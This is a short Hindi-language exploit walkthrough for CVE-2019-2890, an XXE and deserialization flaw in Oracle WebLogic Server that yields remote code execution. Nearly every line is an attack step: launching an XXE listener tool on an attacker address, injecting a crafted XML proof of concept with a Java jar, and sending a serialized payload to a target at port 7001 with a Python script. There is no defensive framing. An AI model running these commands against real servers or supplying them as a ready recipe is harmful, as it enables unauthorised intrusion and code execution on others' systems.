
CVE-2019-2890 के लिए शोषण जो XXE इंजेक्शन और डिसीरियलाइज़ेशन के माध्यम से Oracle WebLogic Server को लक्षित करता है, क्राफ्टेड पेलोड के माध्यम से दूरस्थ कोड निष्पादन सक्षम करता है।
XXER उपकरण चालू करें python xxer.py -H 192.168.17.223
xxer का POC xx.xml फ़ाइल में रखें, सीरियलाइज़्ड डेटा को बदलें, xxer का POC इंजेक्ट करें; java -jar weblogic_xxe.jar xx.xml
java-deserialization-exploit उपकरण में weblogic.py का उपयोग करके weblogic सर्वर को डेटा भेजें python weblogic.py 192.168.17.222 7001 weblogic